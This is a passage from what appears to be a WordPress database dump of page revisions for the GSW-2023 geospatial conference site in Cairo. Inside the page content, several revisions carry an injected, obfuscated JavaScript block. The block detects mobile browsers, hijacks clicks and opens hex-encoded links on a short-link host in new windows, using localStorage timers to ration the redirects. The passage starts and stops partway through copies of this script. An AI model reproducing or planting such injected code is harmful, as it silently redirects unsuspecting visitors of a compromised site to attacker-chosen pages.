g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:48:55','2022-11-08 22:48:55','',3066,'https://gsw2023.com/?p=3105',0,'revision','',0),
(3106,1,'2022-11-08 22:50:07','2022-11-08 22:50:07','[vc_row][vc_column width=\"1/3\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h5>The First Geospatial Week in Africa and The Middle East</h5>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column][vc_column width=\"1/3\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][ult_buttons btn_align=\"ubtn-center\" icon=\"fas fa-stream\" icon_size=\"32\" btn_icon_pos=\"ubtn-sep-icon-left-rev\"][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:50:07','2022-11-08 22:50:07','',3066,'https://gsw2023.com/?p=3106',0,'revision','',0),
(3107,1,'2022-11-08 22:54:46','2022-11-08 22:54:46','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][ult_buttons btn_align=\"ubtn-center\" icon=\"fas fa-stream\" icon_size=\"32\" btn_icon_pos=\"ubtn-sep-icon-left-rev\"][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 